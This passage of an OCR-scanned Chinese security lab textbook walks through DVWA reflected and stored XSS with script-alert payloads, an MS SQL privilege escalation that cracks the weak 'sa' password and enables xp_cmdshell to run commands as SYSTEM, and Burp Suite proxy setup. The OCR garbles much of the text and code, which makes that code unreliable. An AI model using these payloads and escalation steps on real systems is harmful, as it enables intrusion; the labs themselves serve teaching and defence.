dvwa/vulnerabilities/xss_r/) ,将 该 URL 复制 到 浏览 硕 的 地 址 栏 , 进 入 如 图 5-53 Brzn HJ 
界面 。 

步骤 4. 选择 DVWA Security 的 安全 级 别 , 此 处 选择 low( 低 ) 选 项 ,如 图 5-54 所 示 。 
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Vulnerability: Reflected Cross Site Scripting (XSS) 


NIC vow name? 


More info 


Usemame«e. 20mwn 
Security Levet low 
PHED S: 8ranie-3 


5-53 ”存在 反射 型 XSS 漏洞 页 面 


DVWA Security * 


Script Security 


Secwrty Level i cument?y Kw 


You can set Ove vecunty level to how. mediam o gh 


The secunty evel changes The 让 aaa level of OVA 


kw — [v*]| Sub 


PHPIDS 


v 9.6 (PHP Inteesoon Detection System) is a seconty Lyer bor PHP based web apple abons 


You can enabhe PHPIDS across thes side Kv tha. doraeon ol yoor Session 


PHPIDS is cumenthy disabled | | 
| -= 


Username: adran 
Security Level: iow 
PHPIOS: $3sabied 


5-54 选择 DVWA Security 的 安全 级 别 
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步骤 5: 查看 正常 输入 输出 。 在 输入 框 中 输入 “test”, 单 击 Submit 按钮 ,可 以 看 到 页 面 


上 的 正常 返回 结果 ,如 图 5-55 所 示 , 说 明 这 个 页 面 的 功能 是 将 用 户 输 入 的 信息 直接 发 送 给 
HP, 


More info 


B] 5-55 页 面 正 常 输入 效果 


步骤 6: 查看 PHP 源码 。 单 击 右 下 角 的 View Source 按钮 ,可 以 看 到 页 面 的 PHP 源 
码 , 如 图 5-56 所 示 。 从 源码 中 可 以 看 出 ,页 面 直 接 将 用 户 输入 的 信息 返回 给 用 户 。 


«?php 
if('array key exists ("name", $ GET) || $ GET 
['name'] == NULL || $ GET['name'] == '*)( 


Sisempty = true; 


m rn ' 


echo 'Hello ' . $ GET['name']; 


5-56 ”页面 PHP 源码 


步骤 7: 进行 攻击 测试 。 在 输入 框 中 输入 “< script > alert / XSS/) €/script >” ,可 以 看 
到 非 正 常 返 回 结 果 页 面 ,如 图 5-57 所 示 。 同 时 在 IP 地 址 中 可 以 看 到 输入 内 容 的 URL Z9 
码 , 如 图 5-58 所 示 。 由 此 说 明 , Web 应 用 将 未 经 验证 的 数据 通过 请 求 发 送 给 客户 病 。 
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图 5-57 页 面 攻 击 效 果 


a more rr 9c mc qmm Mt ÁO room ii 
i A m s = > 


回 http://127.0.0.1/dvwa/vulne 


r/?name- 963Cscript&3Ealert 28962FX $$962P962996 3C 96 2Fecript96 3E 


^ "— =. D a = 一 


5-58 被 攻击 页 面 此 时 的 IP 地 址 


步骤 8: 验证 此 类 漏洞 的 非 持 久 性 。 重 新 访问 DVWA 页 面 , 单 击 刷 新 按钮 或 再 次 选择 
左 侧 XSS reflected 选项 ,可 以 看 到 页 面 恢 复 正 常 , 巾 此 说 明之 前 输入 的 信息 未 保存 ,是 非 持 
和 久 性 路 站 脚本 漏洞 。 

步骤 9. 存储 型 XSS 攻击 。 打 开 存 在 漏洞 的 网 站 http: //localhost/dvwa/ vulnerabilities/ 
xss s/. TE DVWA 页 面 中 选择 左 侧 的 KSS Stored FAR XSS) 选 项 ,出现 如 图 5-59 所 示 的 
F HI o 

步骤 10: fEBIE d ASI. Æ Name 输入 框 中 输入 “test”, 在 Message fii A TEE rP dj 
人 和信 “This is a test comment", iF Sign Guestbook 按钮 ,可 以 得 到 正常 的 返回 结果 如 图 5-60 
所 示 ,说明 该 网 页 是 为 用 户 发 表 团 名 和 评论 的 。 

步骤 11: 查看 PHP 源码 。 单 击 右 下 角 的 View Source 按钮 ,可 以 看 到 页 面 的 PHP 源 
码 , 如 图 5-61 所 示 。 从 源码 中 可 以 看 出 ,页 面 允 许 用 户 存储 未 正确 过 滤 的 信息 。 

步骤 12: 进行 攻击 测试 。 在 Name 输入 框 中 输入 “Test”, 在 Message 输入 框 中 输入 
“< script > alert(/XSS/)</script >”, 单 击 Sign Guestbook 按钮 ,再 次 访问 页 面 就 可 以 看 到 
如 图 5-62 所 示 的 对 话 框 。 
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Vulnerability: Stored Cross Site Scripting (XSS) 


Name“ 


Message " 


Name tesi 
Message Thes is à lest comment 


More info 


PHPIDS: dieabed 


B] 5-59 存在 存储 型 XSS 漏洞 的 页 面 


DWWA) 


Vulnerability: Stored Cross Site Scripting (XSS) 


Name " 


Message * 


Name wat 
Massage This iB à iesi comment 


Mame X41 
Message This js 2 iesi Comment 


More info 


Usemarme- ima 
Secerity Levet 3h 
puso S: $sabled 


图 5-60 正常 输入 效果 
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ID 


jif[issect($ POST['brnS:gn'])) 
‘ 


$message ~ crimi($ POST['mrxMessage']); 
$5ane = £rzimi$ POST['txcName']):; 


Smessage = 3trlipslashes(5messa8g4): 
$message - mysql real escape stringí(f$message): 


janactirp name 


$name = mysqi real escape stringi$name,): 
$query = "INSERT INTO guestbook (comment,name) VALUES |'$message','$name'):": 


$resulct = mysql queryi(S$query) or die('cpre»' . mysql errori) + '«/pre»' ): 


5-61 页 面 PHP 源码 


Vulnerability: Stored Cross Site Scripting (XSS) 


图 5-62 ”被 攻击 的 页 面 


步骤 13: 验证 漏洞 的 存储 性 。 重 新 访问 DVWA 页 面 , 单 击 刷 新 按钮 或 再 次 选取 左 侧 
的 XSS stored 选项 ,可 以 看 到 页 面 仍然 为 图 5-62 所 示 之 前 的 对 话 框 ,说 明之 前 输入 的 信息 
被 保存 了 下 来 。 


5.6.4 任务 与 思考 


可 通过 以 下 方法 来 防范 XSS 攻击 。 
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1. XSS 过 滤 

虽然 XSS 攻击 的 对 象 是 客户 端 ,但 XSS 的 本 质 是 Web 应 用 服务 的 漏洞 ,所 以 必须 同时 
对 Web 服务 器 和 客户 端 进行 安全 加 固 才 能 避免 攻击 的 发 生 。XSS 过 滤 需 要 在 客户 端 和 服 
务 器 端 同时 进行 。 

2. 输入 验证 

输入 验证 就 是 对 用 户 提交 的 信息 进行 有 效 性 验证 , 仅 接受 有 效 的 信息 ,阻止 或 忽略 无 效 
的 用 户 输入 信息 。 在 对 用 户 提 交 的 信息 进行 有 效 性 验证 时 ,不 仅 要 验证 数据 的 类 型 ,还 要 验 
证 其 格式 ,长度 . 范围 和 内 容 。 

3. 输出 编码 

由 于 大 多 数 Web 应 用 程序 都 会 把 用 户 输入 的 信息 完整 地 输出 到 页 面 中 ,从 而 导致 XSS 
漏洞 的 存在 。 为 解决 这 一 问题 , 当 需 要 将 一 个 字符 串 输 出 到 Web 网 页 ,但 又 无 法 确定 这 个 
字符 串 是 否 包 含 XSS 特殊 字符 时 ,为 了 确保 输出 内 容 的 完整 性 和 正确 性 ,可 以 使 用 HTML 
编码 (HTML Encode) 进 行 处 理 。 


5.7 针对 MS SQL 的 提 权 操作 


5.7.1 预备 知识 : MS SQL 提 权 


在 很 多 时 候 , 当 攻击 者 入 侵 一 个 系统 时 ,需要 得 到 的 是 这 个 系统 的 管理 员 权 限 。 但 是 ， 
一 般 情 况 下 获取 到 的 是 普通 用 户 账 户 信息 ,拥有 的 权限 相对 较 小 。 这 时 就 必须 采取 提 权 方 
X ,将 普通 用 户 的 权限 提升 到 管理 员 的 权限 。 提 权 是 指 操作 者 提高 自己 在 系统 中 的 操作 权 
限 ,主要 用 于 网 站 入 侵 过 程 , 当 攻击 者 入 侵 某 一 网 站 时 ,通过 各 种 漏洞 提升 Web Shell 权限 
以 夺 得 该 服务 器 的 控制 权 。 

MS SQL 是 指 微软 的 SQL Server 数据 库 服务 器 , 它 是 一 个 数据 库 平台 ,提供 数据 库 的 
从 服务 需 到 终端 的 完整 的 解决 方案 ,其 中 的 数据 库 服务 需 部 分 是 一 个 数据 库 管 理 系统 ,用 于 
建立 、 使 用 和 维护 数据 库 。 

MS SQL 提 权 是 专门 针对 MS SQL 数据 库 用 户 账户 管理 权限 的 一 种 攻击 方式 ,通过 提 
升 普 通用 户 账 户 的 权限 ,获取 对 MS SQL 数据 库 系统 的 管制 权限 。 


5.7.2 实验 目的 和 条 件 


1. 实验 目的 

在 熟悉 系统 提 权 攻击 基本 方法 的 基础 上 ,以 MS SQL 数据 库 系 统 为 操作 对 象 ,掌握 针 
对 MS SQL 提 权 的 实现 方法 。 

2. 实验 条 件 

本 实验 中 使 用 的 清单 和 软 硬 件 如 表 5-3 所 示 。 
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X 5-3 MS SQL 提 权 实验 清单 
类 型 F E 软 硬 件 要 求 规 格 
攻击 机 操作 系统 版 本 Windows XP 以 上 


X Scan HME, SQL Tools 工具 "SQL AWANA 
1f 

HE gl Windows Server 2003 
软件 版 本 无 


5.7.3 实验 过 程 


步骤 1: 进入 实验 环境 ,分 别 运 行 攻 击 机 Windows XP AEHL Windows Server 2003, 
步骤 2: 查看 靶 机 的 IP 地 址 和 MS SQL 服务 是 否 已 经 正常 启动 ,如 图 5-63 和 图 5-64 
所 示 。 


Microsoft Windows [hA 5.2.3790] 
«C» hETVPA 1985-2883 Microsoft Corp. 


: Documents and Settings MWdministrator»ipconfig 


indous IP Configuration 


thernet adapter 本 地 连接 - 


Connection-specific DNS Suffix : 
a TTA : 192.168.1.55 


Subnet Mask : 255.255.255.8 
Default Gateway * 192.168.1.1 


3 Documents and Settings Vfidministrator?, 


5-63 ”使 用 "ipconfig” 命 令 查 看 靶 机 的 IP 地 址 


xPO BEO EEV EB 
* »|[miidDtagi$gmE »m.numw 
| 名称， | 描述 | 


SyProtected Storage 保 

Gi Renote Access Auto Connec, x. 手动 本 地 系统 
Qi Rencte Access Connection ... Ô. 手动 本 地 系统 
Qu Renote Desktop Melp Sessi, 管 手动 本 地 系统 
Gi Renote Procedure Call (PC) fE Bez) Bzb 网 络 服务 
Gi Renote Procedure Call (RF. B 手动 网 络 服务 
Gio Renote Registry $ 已 局 动 ” 上 自动 本 地 服务 
Sio Renovable Storage 管 手动 本 地 系统 
S Resultant Set of Policy P. B 手动 本 地 系统 
Ss Routing and Remote Access & x 本 地 系统 
S Secondary Logon B 目 动 本 地 系统 
RS ecuri ty Accounts Manager 此 已 县 动 ”自动 本 地 系统 
时 ?Server . 自动 本 地 系统 
S Shell Hardware Detection 为 自动 本 地 系统 
Ry Snar t Card 管 手动 本 地 服务 
人 Special Administration Co $t 手动 本 地 系统 


SUL Server (SSQLSERVERJ 


^ € 网 络 服务 


SQL Server Active Directo * 
(SOL. Server Arant (MSSOISE 执 PAZ AZ zu xi | 


图 5-64 ”查看 SQL Server 是 否 已 经 正常 启动 
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m v3. 3 oT 


. FIRER : Pindos WT/2000/XP/2003 
SiC LE F indos NURDPUNHETRIS , 推荐 运行 于 Windows 200001 LAS erver Mindon: F ik. 


zi 
LM LIEN Bel: MEC 73 
Ig" ROM, X-S- 

. xfocus. net/projec 


GURNA 


EE ERE nal 
SUBE, L domns ARTAL) 


f'scripts/ desc 
İscripts/ cache 


5-65 设置 X-Scan 扫描 器 


步骤 4: 扫描 的 目标 IP 地 址 设置 为 靶 机 的 IP 地 址 (参照 图 5-63 中 显示 的 IP 地 址 ) ,如 
图 5-66 所 示 。 根 据 需 要 ,在 确定 攻击 对 象 的 IP 地 址 范围 但 是 无 法 确定 具体 IP 地 址 的 前 提 
下 ,可 以 在 “指定 IP 范围 ”文本 框 中 输入 需要 扫描 的 IP. 地 址 或 地 址 段 。 


指定 IF 范围 ， 
[12. 168. 1. 55] 


mis | 


5-66 ”输入 扫描 的 IP 地 址 或 地 址 段 


步骤 5: 选取 了 扫描 参数 中 的 “扫描 模块 ”选项 后 ,在 中 间 的 列表 框 内 选中 “SQL-Server 
弱 口 令 ” 复 选 框 ,如 图 5-67 所 示 。 
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图 5-67 设置 扫描 模块 
步骤 6: 在 选择 了 “其 他 设置 ”选项 后 ,在 打开 的 如 图 5-68 所 示 的 对 话 框 中 可 以 根据 需 


要 选择 相应 的 功能 项 。 例 如 ,选中 “显示 详细 进度 ” 复 选 框 后 可 以 实时 查看 扫描 过 程 的 进展 
情况 。 


图 5-68 ”设置 “其 他 设置 ”功能 项 


步骤 7: 选择 “插件 设置 "一 “字典 文件 设置 ”选项 ,在 打开 的 如 图 5-69 所 示 的 对 话 框 中 
设置 扫描 过 程 中 需要 使 用 的 字典 (也 可 以 使 用 默认 字典 )， 

步骤 8: 单 击 “ 确 定 ” 按 钮 开始 进行 扫描 ,扫描 结果 如 图 5-70 所 示 ,得 到 了 MS SQL 数据 
库 使 用 的 弱 口令 (sa/123456)。 

步骤 9: 使 用 第 三 方 工具 SQL Tools 工具 连接 到 MS SQL 数据 库 ( 也 可 以 使 用 MS 
SQL 自身 提供 的 SQL-Server 工具 进行 连接 ) ,如 图 5-71 所 示 。 
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,\dat\weak pass. dic 
. Mdathevs user. dic 


, Ndat weak pass. dic 
, MdatM£tp user, dic 

, Mdat weak pass. dic 
, Mat Vasail, user. dic 
, Ndat weak pass. dic 
, Mdatinntp, user. dic 
, dat weak pass. dic 
, Mdat ail, user. dic 
, Ndat weak pass. dic 
, Mat Melnet user. dic 
, Mat weak pass. dic 
, Mdat'hnt, user. dic 

, Mat weak, pass. dic 
, Mdat mail, user. dic 
, dat weak pass. dic 


图 5-69 设置 扫描 过 程 中 使 用 的 字典 


， K-Scan v3.3 GUI 
XAW SEO 380) IRW Lec EH 
jo >ò na Gg ga o 
局 -加 192. 168. 1.55 主机 | 累计 时 间 | ena | ERA 


[192. 168 T 55] E TINSQL-Serverd8L] “soa/123456" (192.168 1.55.1433) 
[192. 168. 1.55]: “SQLServer 强 口 今 “ 反 的 充 成 ， 发 现 1. 


图 5-70 ”显示 扫描 结果 


le 设置 SQL 服务 器 


服务 器 名 称 /TF ; 192. 168. 1.55 
用 户 名 : sa 


E 码 : |FFFFFF 
数据 E 名 称 : Master 


V4 E xm» 消 


5-71 使 用 SQL Tools 工具 连接 到 MS SQL 数据 库 
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步骤 10: 连接 成 功 后 进入 如 图 5-72 所 示 的 操作 界面 。 


lé sa 综合 利用 工具 


sqL 服 务 器 设置 sss B 

* 执 行 DOS 命令 

x Ere 

执行 数据 库 命令 

增加 SQL 帐号 

| 注册 表 管 理 

| TASSE : 蓝 色 光芒 
网 站 : http://www. 1285. net 


Zis SQL Server - 192.168.1.55 成 功 


图 5-72 ”连接 成 功 后 的 操作 界面 


步骤 11: 选择 “利用 目录 ”一 “执行 DOS 命令 ?选项 ,在 如 图 5-73 所 示 的 文本 框 中 输入 
要 执行 的 命令 。 例 如 ,输入 “whoami” 命 令 可 以 查看 在 线 的 用 户 。 


Ie 执行 70S 命 今 


[ 三 次 运行 时 执行 结果 不 请 


[c: \>whoani 
SQL Server 阻止 了 对 组 件 'xp cmdshell' 的 过 程 'sys.xp_cmdshell' 的 访问 ， 因 为 此 组 件 已 1 


N 


5-73 ”执行 DOS 命令 界面 


步骤 12: 使 用 查询 分 析 器 连接 MS SQL 数据 库 ,如 图 5-74 所 示 。 
步骤 13: 在 查询 分 析 需 中 执行 如 下 代码 (执行 过 程 和 结果 如 图 5-75 所 示 ) 。 


;EXEC sp configure 'show advanced options', 1 -- 
; RECONFIGURE WITH OVERRIDE 一 一 

;EXEC sp configure 'xp cmdshell', 1 -- 

; RECONFIGURE WITH OVERRIDE 一 一 

;EXEC sp configure 'show advanced options', 0 -- 


步骤 14. 再 次 使 用 SQL Tools 执行 whoami 命令 时 ,返回 信息 如 图 5-76 所 示 , 从 中 可 
以 看 出 ,已 经 获得 了 最 高 权限 (system) ,权限 提升 过 程 结束 。 
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'" SOL EWA 
rg aug seu IA waa «m$ 
|l'ó-a Ed] memAajeo|m- 


a SOL Sevels} [132158155 J] 


r 加 果 SQL Server BSE- RA 
ac) 


连接 合用 : 
C Windows f (936 UE Cw) 
(* SQL Serve 身份 验证 四) 


ERE 


[ we ] ws | em | 


5-74 使 用 查询 分 析 器 连接 MS SQL 数据 库 


" SQL 理 向 分 析 轿 [ frd 192. 168. 1. 55. master. sa I be 18] 
| 文件 Gb HIO IA WO WHY 
O- SUD ; oed Oo [D Ya 人 sse — aua dm 
EDU Q) x| ;EXEC LC ague, show "EI options , | == 
[3 €— -| .EXEC sp configure 'xp cmdshell', 1 -~ 
! . 168. 1. ;RECONFIGURE WITH OVERRIDE 一 
F :EXEC szp configure "show advanced options', 0 一 


TRE EEEN 


&) : "i 
URE 进行 支 装 


5-75 ”在 查询 分 析 器 中 执行 相关 代码 


5.7.4 任务 与 思考 


本 实验 介绍 了 MS SQL 提 权 的 实现 方法 ,通过 实验 读者 会 发 现 提 权 攻击 存在 的 危害 
性 。 通 过 提 权 ,普通 用 户 将 会 拥有 管理 员 的 权限 。 在 拥有 了 管理 员 权 限 后 ,攻击 者 可 以 像 控 
制 本 地 计算 机 一 样 来 操控 被 攻击 对 象 。 

在 大 多 数 情 况 下 ,MS SQL 服务 天 将 被 安装 在 一 个 混合 模式 下 , 它 的 默认 用 户 是 sa, 很 
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[X 执行 D05 命 今 


[ 三 次 运行 时 执行 结果 不 请 


nt authorityAsystem 


图 5-76 已 经 实现 提 权 操作 


多 时 候 对 于 默认 用 户 只 会 设置 一 个 简单 的 密码 ,这 意味 痢 容 易 使 用 字典 文件 进行 又 力 破解 
得 到 密码 。 为 此 ,针对 MS SQL 提 权 攻击 ,最 简单 和 有 效 的 办 法 就 是 为 系统 管理 账户 设置 
复杂 的 密码 并 进行 定期 更 换 , 同 时 提供 完整 的 系统 日 志 , 并 对 日 志 记 录 进 行 及 时 分 析 , 当 发 
现 攻 击 迹象 时 尽快 找到 攻击 源 , 并 进行 必要 的 封 培 , 男 外 ,还 需要 及 时 对 MS SQL 9E fh 
丁 程序 。 


第 6 5€ Web HW ds X [Jj K VII 


Web 浏览 硕 既 是 用 户 访问 互联 网 的 必 备 工具 ,也 是 用 户 进 入 互联 网 世界 的 入 口 , 因 此 
Web 浏览 大 的 安全 决定 了 互联 网 应 用 的 安全 。 与 大 量 功 能 各 异 的 客户 端 软 件 相 比 ,Web X 
昂 胡 虽然 统一 了 用 户 访问 互联 网 的 方式 ,但 由 于 Web 浏览 大 存在 内 核 多 样 .插件 丰富 、 功 能 
扩展 性 强 .兼容 不 同 应 用 等 特点 ,致使 Web 浏览 天 存在 大 量 的 安全 漏洞 。 这 些 安 全 漏洞 一 
旦 被 利用 ,将 会 严重 影 啊 互联 网 用 户 的 信息 安全 。 本 曹 从 攻击 与 防御 两 个 不 同 的 角度 ,通过 
具体 实验 介绍 Web 浏览 大 的 攻防 方法 。 


6.1 Burp Suite 漏洞 扫描 使 用 


6.1.1 预备 知识 : Burp Suite 工具 介绍 


Burp Suite 是 一 个 主要 针对 Web 应 用 程序 进行 攻击 的 工具 集 , 为 便于 在 应 用 中 实现 不 
同 工 具 之 间 的 交互 性 和 功能 整合 , 它 提供 了 一 个 集成 平台 。 例 如 ,在 一 个 工具 处 理 HTTP 
请 求 和 啊 应 时 ,通过 该 平台 可 以 选择 调用 其 他 任意 的 工具 。 而 且 ,为 方便 其 他 应 用 程序 的 调 
用 ,Burp Suite 工具 还 提供 了 相应 的 接口 。 

Burp Suite 以 代理 方式 工作 ,默认 的 代理 端口 为 8080。 在 具体 应 用 中 ,可 以 将 运行 
Burp Suite 工具 的 主机 设置 成 一 个 Web 浏览 需 使 用 的 代理 服务 需 , 以 便 拦 截 所 有 被 扫 摘 的 
Web 网 站 的 流量 , 供 系 统 查看 、 分 析 和 修改 。 此 外 ,Burp Suite 还 提供 了 地 图 功能 ,可 以 对 被 
扫描 主机 和 目录 生成 一 个 地 图 ,以 直观 的 形式 供 使 用 者 进行 分 析 。 

Burp Suite 平台 主要 提供 了 以 下 工具 。 

(1) Proxy fV JD, Proxy 是 一 个 拦截 HTTP/HTTPS 的 代理 服务 器 ,通过 代理 服务 器 
来 拦截 浏览 硕 与 目标 应 用 程序 之 间 的 流量 ,为 进一步 查看 或 修改 相关 信息 提供 原始 数据 流 。 

(2) Spider WRECK). Spider 是 一 个 具有 特殊 应 用 功能 的 网 络 爬 虫 , 它 能 完整 地 枚 举 
应 用 程序 的 内 容 和 功能 。 

(3) Scanner 1i», Scanner Æ Burp Suite 具有 的 一 个 高 级 应 用 工具 ,使 用 该 工具 可 
以 扫描 发 现 Web 应 用 程序 的 安全 漏洞 。 

(4) Intruder( 干 扰 者 )。Intruder Œ Burp Suite 提供 的 一 个 可 配置 的 暴力 破解 攻击 工 
具 , 主 要 实现 对 Web 应 用 程序 进行 目 动 攻击 ,包括 收集 有 用 的 数据 .漏洞 模糊 测试 等 。 

(5) RepeaterC'PZE 28), Repeater 是 一 个 帮助 攻击 者 完成 Web 站 点 扫描 的 辅助 工具 ， 
利用 该 工具 可 以 根据 攻击 者 的 需要 单独 发 送 HTTP 请 求 , 并 对 请 求 的 响应 进行 分 析 , 通 过 
分 析 补 充 判 断 Web 站 点 存在 的 安全 漏洞 。 

(6) Sequencer GE $8) Sequencer 是 一 个 用 于 在 扫描 得 到 的 随机 样本 中 对 指定 的 数 
据 项 进行 分 析 的 工具 。 例 如 ,利用 Sequencer 工具 可 以 测试 应 用 程序 的 会 话 令 有 牌 (session 


tokens) , 
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(7) Decoder(Afi3 23), Decoder 是 Burp Suite 提供 的 一 蒜 编 码 解 公 工 具 , 利 用 Decoder 
可 以 将 原始 数据 转换 成 各 种 需要 的 编码 和 哈 布 表 。 

(8) Comparer( 比 较 硕 ) Comparer 是 一 个 以 可 视 化 方式 对 比分 析 两 项 数据 之 间 差 异 
性 的 工具 。 例 如 ,在 枚 举 用 户 名 的 过 程 中 ,利用 Comparer 工具 可 以 对 比分 析 登 录 成 功 和 失 
败 时 服务 颖 端 反 馈 结 果 的 区 别 。 


6.1.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,学 习 漏 洞 扫 摘 技术 的 基本 原理 ,了 解 漏洞 扫 摘 技术 在 网 络 攻防 中 的 作用 ; 
通过 上 机 实验 ,掌握 使 用 Burp Suite 对 目标 网 站 进行 扫描 的 具体 方法 ,并 根据 报告 做 出 相应 
的 防护 措施 。 
2. 实验 条 件 
本 实验 所 需要 的 软 人 硬件 清单 如 表 6-1 所 示 。 
X 6-1 Burp Suite 漏洞 扫描 使 用 实验 清单 


1 台 
攻击 机 —1— —]— 9E — Windows XP 及 以 上 
EE | HR | 18 
$E pL Windows Server 2003 
Xx 


6.1.3 实验 过 程 


步骤 1: 登录 到 实验 场景 中 的 靶 机 ,在 该 计算 机 上 需要 事先 搭建 一 个 网 站 ,并 且 能 够 正 
常 访 问 。 例 如 ,本 实验 中 搭建 了 一 个 简单 的 可 以 使 用 域名 www. sql. com 访问 的 网 站 ,如 
图 6-1 所 示 。 

需要 说 明 是 ,为 便于 实验 的 进行 ,本 实验 中 搭建 的 网 站 需要 具备 后 台 管 理 功能 , 当 后 台 
管理 员 登 录 时 ,需要 验证 其 输入 的 用 户 名 和 密码 的 正确 性 ,以 此 对 登录 者 身份 的 合法 性 进行 

步骤 2. 登录 攻击 机 (本 实验 使 用 Windows XP) ,安装 Burp Suite 软件 ,成功 安装 后 的 
运行 界面 如 图 6-2 所 示 。 

步骤 3: 打开 C:\Windows\System32\drivers\etc\hosts 文件 ,将 靶 机 Windows Server 
2003 上 的 网 站 在 客户 机 (攻击 机 ) 上 进行 映射 。 本 实验 中 Windows Server 2003 的 IP 地 址 
是 192.168. 1. 104, 所 以 在 hosts 文件 中 的 映射 方式 为 192. 168. 1. 104 www. sql. com, 如 
图 6-3 所 示 。 

步骤 4: 在 “命令 提示 符 ” 中 输入 “ping www. sql. com” 命 令 , 当 网 站 的 主机 名 和 IP H ht 
之 间 的 映射 正常 时 ,将 出 现 网 络 连接 正常 的 提示 信息 ,如 图 6-4 所 示 。 青 在 浏览 器 的 地 址 栏 
中 输入 网 站 名 称 (www. sql. com) ,如 果 当 前 配置 无 误 , 则 会 显示 类 似 图 6-1 中 的 页 面 信息 。 
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好 好 公司 网 站 


R 


[好 好 先生 公司 ] 科技 创造 一 切 (550,236) 
[好 好 先生 公司 ] 好 好 先生 公司 CASH, 180) 


licensed to DrakonHaSh 


^" z — 
| L | T 
Efe z 


Filter: hiding not found items; hiding CSS, image and general binary content, hiding 4xx responses; hiding empty folders 
Params] staus| wn 


6-2 Burp Suite 运行 界面 
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P hosts - 记事 本 
文件 G) RRE 格式 (0) eoo 帮助 00 
Copyright (c) 1993-1999 Microsoft Corp. 


This is a sample HOSTS file used by Microsoft TCP/IP for Windows. 


R 

u 

"u 

u 

# This file contains the mappings of IP addresses to host names. Each 

# entry should be kept on an individual line. The IP address should 

# be placed in the first column followed by the corresponding host name. 
# The IP address and the host name jshould be separated by at least one 
# space. 
H 
u 
"u 
E 
t 
"u 
u 
8 


Additionally, comments (such as these) may be inserted on individual 
lines or following the machine name denoted by a '#' symbol. 


For example: 


102.54.94.97 rhino.acne .com # source server 
38.25.63.10 x.acne.con # x client host 


127.0.0.1 localhost 
192.168.1.104  www.sql.com 


4, burp suite... 


图 6-3 ”进行 IP 地 址 与 主机 名 之 间 的 映射 


icrosoft Windows XP [MA 5.1.2688] 
《C》 有 版权 所 有 1985-2001 Microsoft Corp. 
:NDocuments and Settings ‘dninistrator2ping www.sql.com 


Pinging www.sql.com [192.168.1.184] with 32 bytes of data: 


Reply from 192.168.1.104: bytes-32 tinmne<ins TTL=128 
Reply from 192.168.1.104: bytes-32 tine«1ns TTL=129 
Reply from 192.168.1.104: bytes-32 tineX1ns TTL=128 
Reply from 192.168.1.184: bytes=32 timneX1ns TTL=128 


Ping statistics for 192.168.1.184: 

Packets: Sent = 4, Received = 4, Lost = 8 «87» loss), 
Approximate round trip times in milli-seconds: 

Minimum = Ümns, Maximum = Üns, fiverage = Ons 


:NDocuments and Settings Administrator», 


图 6-4 用 “ping www. sql. com" &p & Mit www. sql. com 网 站 是 否 可 以 访问 


步骤 5: Burp Suite 具有 网 络 代 理 功 能 ,默认 运行 在 端口 8080 上 ,使 用 这 个 代理 ,可 以 
截获 并 修改 从 客户 端 到 Web 应 用 程序 的 数据 包 。 为 了 拦截 请 求 数据 包 , 并 对 其 进行 操作 ， 
实验 中 必须 对 Burp Suite 中 有 关 攻 击 机 的 浏 览 套 进行 配置 ,将 其 配置 为 代理 服务 希 。 本 实 
验 使 用 IE 浏览 器 ,可 选择 “Internet 选项 ”一 “连接 ”一 “局 域 网 设置 ”选项 ,在 打开 对 话 框 的 
“代理 服务 右 ” 栏 中 选中 “为 LAN 使 用 代理 服务 融 ” 复 选 框 ,并 分 别 在 "地址 ”和 “ 端 后 ”文本 
框 中 输入 相应 的 信息 ,如 图 6-5 所 示 。 

步骤 6: 设置 好 攻击 机 的 Web 浏览 融 并 重新 启动 后 , 先 运行 Burp Suite iiit. 后 再 打 
JF IE Ni 94 28 «7; In] Pd yh www. google. com( 访 问 之 前 要 确保 Burp Suite 已 经 运行 )， " 会 出 
现 如 图 6-6 所 示 的 显示 信息 ,说 明 Burp Suite 已 经 能 正常 地 捕获 所 访问 网 站 的 信息 。 
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Internet 选项 ; i 
za | 安全 leu | 内 容 | 连接 | 程序 高 级 -D E-e 

设置 一 个 Internet 连接 ， 单 击 “ 设 (geszisg Q0...) 
?5 : E BHA (LANKE 


拨号 和 成 拟 专用 网 络 设置 0 
rts en EATER x: : 
GARRA TEF. 和 要 确 保 使 用 手动 设置 ， 请 茜 用 自动 配 
HER Œ) à 

着 果 作 要 为 连接 也 置 代理 服务 器 ， 章 击 “ 设 。 | ENS) O 自动 检测 设置 人) 

. 口 使 用 自动 配置 脚本 G) 

不 论 网 络 连 接 是 否 存在 都 进行 拨号 0) 

ftit PRRERLL IE TR (D) 代理 服务 器 
当前 默认 连接 ; 无 VERUR Œ) 用 代理 服务 器 0) (这 些 设置 不 会 应 用 于 拨号 或 
RAAUM 地 址 0: 


pingges | Oem 


EIS 


6-5 修改 攻击 机 的 浏览 器 配置 


4 burp suite professional vl1.4.07 — licensed to DrakonHaSh 

burp intruder repeater window about 

| target | proxy spider | scanner | intruder | repeater sequencer | decoder | comparer | options | alerts 
intercept | options | history | 


request to hltp.//www.google.com:80 [74.125.128.99] 


| ^ 


User-Agent: User-Agent: Mozíilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa 
Toolbar) 
Pragma: no-cache 


Cache-Control: no-cache I 
Host: www.google.com 


6-6 Burp Suite 开始 捕获 Web 浏览 器 的 操作 


步骤 7: target 选项 卡 。target 是 一 个 目标 选项 卡 , 在 了 正 浏 览 硕 中 访问 的 网 站 信息 将 
会 显示 在 该 选项 卡 下 方 的 site map 选项 卡 中 。scope 选项 卡 设 置 具体 的 扫描 范围 ,如 图 6-7 
所 示 。 

步骤 8: spider 主要 通过 网 络 爬 虫 来 朴 取 网 页 信息 ,如 图 6-8 所 示 。 

步骤 9: 在 图 6-8 中 的 左 侧 列表 中 选取 要 爬 取 的 网 站 名 称 ( 本 实验 为 www. sql. com? 后 
右 击 ,在 出 现 的 快捷 菜单 中 选择 spider this host 选项 ,就 会 自动 跳 转 到 spider. 页 面 ,显示 正 
在 爬 取 网 页 已 经 发 送 的 请 求 数量 . 字 节 传输 量 . 疏 取 范围 等 信息 ,如 图 6-9 所 示 。 

步骤 10: 主动 扫描 网 站 。 该 操作 在 target site map 选项 卡 中 进行 。 在 图 6-8 中 的 左 
侧 列 表 中 选取 网 站 (本 实验 为 www. sql. com) 后 右 击 ,在 出 现 的 快捷 菜单 中 选择 actively 
scan this host 选项 ,将 会 出 现 主 动 扫 摘 回 导 提 示 页 面 , 系 统 提 示 用 户 已 经 选择 了 一 些 项 目 
作为 扫 摘 的 对 象 。 为 了 取得 更 好 的 扫 摘 效果 ,可 以 选中 或 取消 选中 相关 的 项 目 ( 一 般 选 择 默 
认 设 置 即 可 ) ,如 图 6-10 所 示 。 
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^ burp suite professional vl.4.07 — licensed to DrakonHaSh 

burp intruder repeater window about 

target f spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts | 
site map 


target scope 


Define the in-scope targets for your current work. This configuration affects the 
